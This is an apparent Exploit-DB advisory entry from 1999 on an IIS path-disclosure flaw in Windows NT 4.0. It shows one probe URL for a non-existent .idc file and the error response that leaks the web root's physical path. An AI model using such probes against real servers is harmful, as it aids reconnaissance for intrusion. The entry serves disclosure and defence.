Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability

1999-06-04T00:00:00
ID EDB-ID:19239
Type exploitdb
Reporter Scott Danahy
Modified 1999-06-04T00:00:00

Description

Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/299/info

The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of the "missing" .IDC file. 

"http://www.someURL.com/hackme.idc"

will return:

Error Performing Query
Error processing file 'c:\inetpub\scripts\samples\hackme.idc'